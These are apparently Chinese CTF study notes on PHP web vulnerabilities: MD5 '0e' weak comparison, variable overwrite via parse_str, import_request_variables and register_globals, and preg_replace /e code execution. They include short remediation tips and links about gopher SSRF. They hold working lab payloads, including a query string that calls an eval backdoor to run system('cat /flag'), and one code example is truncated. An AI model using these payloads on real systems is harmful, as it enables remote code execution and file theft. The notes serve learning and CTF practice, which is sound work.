首先要求使用GET提交id参数,然后parse_str($id)对id参数的数据进行处理,再使用判断$a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')的结果是否为真,为真就返回flag,md5('QNKCDZO')的结果是0e830400451993494058024219903391由于此次要满足$a[0] != 'QNKCDZO' && md5($a[0]) == md5('QNKCDZO')所以要利用php弱语言特性,0e123会被当做科学计数法,0 * 10 x 123。所以需要找到一个字符串md5后的结果是0e开头后面都是数字的,如,240610708,s878926199a
PHP处理0e开头md5哈希字符串缺陷/bug 参考:http://www.cnblogs.com/Primzahl/p/6018158.html
解题方法:
使用GET请求id=a[0]=240610708,这样会将a[0]的值覆盖为240610708,然后经过md5后得到0e462097431906509019562988736854与md5('QNKCDZO')的结果0e830400451993494058024219903391比较都是0 所以相等,满足条件,得打flag。
最终PAYLOAD:
GET DATA:
?id=a[0]=s878926199a
or
?id=a[0]=240610708
1. import_request_variables()
(PHP 4 >= 4.1.0, PHP 5 < 5.4.0)
import_request_variables — 将 GET/POST/Cookie 变量导入到全局作用域中
将 GET/POST/Cookie 变量导入到全局作用域中。如果你禁止了 register_globals,但又想用到一些全局变量,那么此函数就很有用。
import_request_variables ( string $types [, string $prefix ] ) : bool
参考引用:https://www.php.net/manual/zh/function.import-request-variables.php
2.CTF中import_request_variables()导致的变量覆盖
//payload:http://127.0.0.1/test.php?num=xiaohua
//flag{ xiaohua-2020-3-28}
3.漏洞修复
尽量不要使用....
1.register_globals
当register_globals全局变量设置开启时,传递过来的值会被直接注册为全局变量而使用,这会造成全局变量覆盖
在PHP5.3之前 默认开启 PHP5.3默认关闭 PHP5.6及5.7已经被移除
2.CTF中全局变量覆盖
测试环境:php5.2.17
//payload:http://127.0.0.1/test.php?num=1
//flag{xiaohua-2020-3-28}
3.漏洞修复
关闭register_globals=off 或者使用5.6以上版本。。
官方文档:https://www.php.net/manual/zh/function.preg-replace.php
正则表达式:https://www.jb51.net/article/46458.htm
preg_replace ( mixed $pattern
, mixed $replacement
, mixed $subject
[, int $limit
= -1 [, int &$count
]] ) : mixed
参数 ¶
pattern
要搜索的模式。可以使一个字符串或字符串数组。
可以使用一些 PCRE 修饰符。
replacement
用于替换的字符串或字符串数组。如果这个参数是一个字符串,并且 pattern
是一个数组,那么所有的模式都使用这个字符串进行替换。如果 pattern
和 replacement
都是数组,每个 pattern
使用 replacement
中对应的元素进行替换。如果 replacement
中的元素比 pattern
中的少,多出来的 pattern
使用空字符串进行替换。
replacement
中可以包含后向引用 \\n
或 $n
,语法上首选后者。 每个这样的引用将被匹配到的第 n 个捕获子组捕获到的文本替换。 n 可以是0-99,\\0
和 $0
代表完整的模式匹配文本。捕获子组的序号计数方式为:代表捕获子组的左括号从左到右, 从1开始数。如果要在 replacement
中使用反斜线,必须使用 4 个("\\\\"
,译注:因为这首先是 PHP 的字符串,经过转义后,是两个,再经过正则表达式引擎后才被认为是一个原文反斜线)。
当在替换模式下工作并且后向引用后面紧跟着需要是另外一个数字 (比如:在一个匹配模式后紧接着增加一个原文数字),不能使用 \\1
这样的语法来描述后向引用。比如,\\11
将会使preg_replace() 不能理解你希望的是一个 \\1
后向引用紧跟一个原文 1
,还是一个 \\11
后向引用后面不跟任何东西。 这种情况下解决方案是使用 ${1}1
。这创建了一个独立的 $1
后向引用, 一个独立的原文 1
。
当使用被弃用的 e
修饰符时, 这个函数会转义一些字符 (即:'
、"
、 \
和 NULL) 然后进行后向引用替换。当这些完成后请确保后向引用解析完后没有单引号或双引号引起的语法错误 (比如: 'strlen(\'$1\')+strlen("$2")'
)。确保符合 PHP 的 字符串语法,并且符合 eval 语法。因为在完成替换后,引擎会将结果字符串作为 PHP 代码使用 eval 方式进行评估并将返回值作为最终参与替换的字符串。
subject
要进行搜索和替换的字符串或字符串数组。
如果 subject
是一个数组,搜索和替换回在 subject
的每一个元素上进行, 并且返回值也会是一个数组。
limit
每个模式在每个 subject
上进行替换的最大次数。默认是 -1
(无限)。
count
如果指定,将会被填充为完成的替换次数。
特别说明:
/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。
举例:
源码:
$str) {
echo complex($re, $str). "\n";
}
function getFlag(){
@eval($_GET['cmd']);
}
payload:?\S*=${getFlag()}&cmd=system('cat /flag');
题目:[BJDCTF2020]ZJCTF,不过如此
wp:https://blog.csdn.net/qq_41628669/article/details/106133128
1、Gopher协议在SSRF漏洞中的深入研究 https://zhuanlan.zhihu.com/p/112055947
2、gopher协议的攻击利用https://www.jianshu.com/p/ce3bd1db0a46
3、CTF gopher协议 https://blog.csdn.net/a3320315/article/details/102880329
https://www.cnblogs.com/Konmu/p/12984891.html
4、工具 https://github.com/tarunkant/Gopherus